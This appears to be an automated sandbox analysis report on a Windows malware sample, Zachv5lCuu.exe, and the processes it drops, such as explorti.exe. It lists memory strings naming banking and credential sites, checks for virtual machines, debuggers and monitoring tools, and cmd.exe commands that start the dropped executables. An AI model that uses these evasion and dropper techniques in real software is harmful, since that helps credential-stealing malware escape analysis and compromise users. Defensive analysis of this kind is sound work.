Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000001FEC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000002.2552429167.0000000001552000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000002.2552429167.0000000001594000.00000004.00000020.00020000.00000000.sdmp, 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001C7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: KKFHJJDH.0.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: discord.comVMware20,11696492231f
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: KKFHJJDH.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: KKFHJJDH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: explorti.exe, 0000000B.00000002.2552429167.0000000001594000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt]
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: KKFHJJDH.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWJ
Source: KKFHJJDH.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_0508000F Start: 0508017E End: 0508002B 9_2_0508000F
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_05080C45 rdtsc 9_2_05080C45
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD05FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CD05FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CCA3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C2643B mov eax, dword ptr fs:[00000030h] 11_2_00C2643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C2A1A2 mov eax, dword ptr fs:[00000030h] 11_2_00C2A1A2
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CCDB66C
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CCDB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB341 cpuid 0_2_6CCDB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
